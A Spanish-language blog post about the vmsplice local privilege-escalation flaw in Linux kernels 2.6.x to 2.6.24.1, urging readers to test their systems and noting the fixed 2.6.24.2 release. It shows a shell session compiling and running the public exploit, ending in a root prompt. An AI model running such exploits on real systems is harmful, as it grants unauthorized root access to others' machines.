Vulnerabilidad en Linux – Kernel 2.6.x – 2.6.24.1

Como muchos ya saben, se ha descubierto una grave vulnerabilidad en el kernel linux (2.6.x – 2.6.24.1) que permite a un usuario con acceso local obtener privilegios de root ejecutando un simple exploit.

Si queréis poder dedicar un minuto a jugar un poco con el exploit para comprobar por uno mismo si afecta a nuestra distribución. Para ello basta descargar el código fuente del exploit (y aquí otra variante), compilarlo y ejecutarlo como usuario normal. A continuacion las acciones:

zarpele@makid:~$ uname -r
2.6.22-3-686

zarpele@makid:~/Desktop$ gcc exploit.c -o exploit
zarpele@makid:~/Desktop$ whoami
zarpele
zarpele@makid:~/Desktop$ ./exploit
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7dd2000 .. 0xb7e04000
[+] root
root@makid:~/Desktop#

Casi tan pasmosa como la efectividad del exploit es la sencillez del parche que lo soluciona.
Ya hay nueva versión del kernel (2.6.24.2) con el bug resuelto.
Esto es importante ya que dispones de un ciber con este kernel cualquier usuario podria acceder como root y hacer lo que quiera!!!.

DistroWatch hace un resumen de la rapidez con que las principales distribuciones GNU/Linux respondieron publicando sus correcciones al problema. Todas las 10 primeras distribuciones reaccionaron en menos de 48 horas:

Saludos…

Fuente: DistroWatch, BraiaNet